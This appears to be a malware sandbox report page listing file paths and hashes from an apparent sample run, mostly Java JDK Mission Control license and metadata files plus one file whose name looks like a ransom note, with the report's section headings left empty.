34fcf90adc20f13e1fdfdcabd5e8e6e33b7663b311e4328c7f2733b17ddbff47

SHA512
a5a9ca78ea2d305ed153f08132e6f5fb344a8d255e90580f2630fdcad59fa0da4d2fae518f25317c7bb117fae8e1466136f1c801c7202d48aaa17029d0b91840

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA
Filesize
9KB

MD5
74626644833cd4810465286b1f1286ad

SHA1
324ef8ab4dffae221879211bc55fc3c4a7c5f7bc

SHA256
a4b4e74b61cded33141319530379171c2620fe8b5fabc8988c3c3521c394b9c3

SHA512
b0da6b225f6b39f099e3b8bbce3d4d19f6be4984acd1a221452d4bb9eaa63373303a999fd4361bcadad83669e9196ffcea92a11452853d3af55d0d84326b6d7d

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf
Filesize
1KB

MD5
1a497ca074e54d7bfc02e0b9d68b74a8

SHA1
925efe6b6366014b42ffa2e10fcd0bf745fec948

SHA256
6e76c313e322e9e2273a027c843a3ab947ac44dd407eb32d47bcc73315f074b9

SHA512
5d7e5b4e76ca5bed7edd1ba059c4735cdf30c91bdc14f07e100a26d1aaadc43d856681af68172913a60c7d953627f8976f899955ed92f436bb5295f6229ffffe

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt
Filesize
12KB

MD5
55450f1bc34ad4ef8288b0fac863776c

SHA1
f0b0053725535658d37f9f437ef8304e5d2f94ad

SHA256
6afa3c5ba25327fbd39026f889fb81079fb074776d28f9039b8a95edb97f7e07

SHA512
523241b7306b63f8beb2b087056199b80b26911417f39ba6986fdeb3735297966e7797e7adbb629fee05bc35376a680693e663f38ca468215f2cb64077320193

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html
Filesize
13KB

MD5
6cbf99beda0046bccc27af369d50656d

SHA1
662820132c4bcced91a6da2470a7ba1729f77365

SHA256
0302a6c315bd9f4d34c3f3e4096ac62aa99526edd543279a14167d3cc34d12c1

SHA512
ac433b9a9887f663e5e5b4420570a3f0eff7dea9c8e490bb159ff37ab642c0ea9c1aa937f462158dd46caa3cd7855e9b1fa2156acd7b7c47952d1f745311a2fd

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html
Filesize
10KB

MD5
f1447bfc5ab2c16f4b6d3a300d251801

SHA1
a1f81a232987df8431d4ff15e17bfd2b97a5b03a

SHA256
f7fa5f197557bef79a01ad8203be40778f0a54e61ea5583316128d3e9108c239

SHA512
9c70eb066657a2c7bfdedfca23c362249ae86905aa9807d45cd310147d779a936701c7f11f699281ab270fef4b4525f6e62d313b01d6f373d0b766415dbb7ac8

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\license.html
Filesize
10KB

MD5
4403f25f9b249a6f3253321011813ea5

SHA1
76768ada791d8a124c0b2dab57953fc2bbe2e381

SHA256
11ca9e32616628c2a5408eca3541f445ecd0aebbf9530e37c09d98518d9d315d

SHA512
a50e64567bb0c0ef9904436239fa0dea5905d8540cec26493ddcbd236ff6eb89e47d2beea139db60689c4cf4d77c32637fa57ed2b11bb0c8b977c41c75d283fd

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html
Filesize
13KB

MD5
4d8e1ee186da54070da0f487f2fffae3

SHA1
61a46f90fb5d582db1b8193994cd7770d7e9e651

SHA256
e9905ff70129193d86740e671badce30704462d8d506b0af0565f35123b7893a

SHA512
b68a828938ae02acba4bbfb6b3dee8fe27d9ed241767649e828e24cfd4c4486219fb91d4e7ea89c6374b466519d95bc4965130ac16b193dde9b0759f66cb9b77

Download Submit
F:\How_to_back_files.html
Filesize
5KB

MD5
740bbabd47bf81732aafa1fba9ca2e88

SHA1
94f115f3e10501cf5156459222b67aaccf1ba9aa

SHA256
9c57eef1c15886196b0db61e17d767a8c48b5d512b224eb376943425e2f75314

SHA512
e7f5dc357ef89e73466aa085bb255bfd7fa3714564f9469605fd5de26202677cfbcc4fa84446a339a1be31bdd99182430ee7ad762d7c39f90a1db60a7d9fd9ee

Download Submit

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads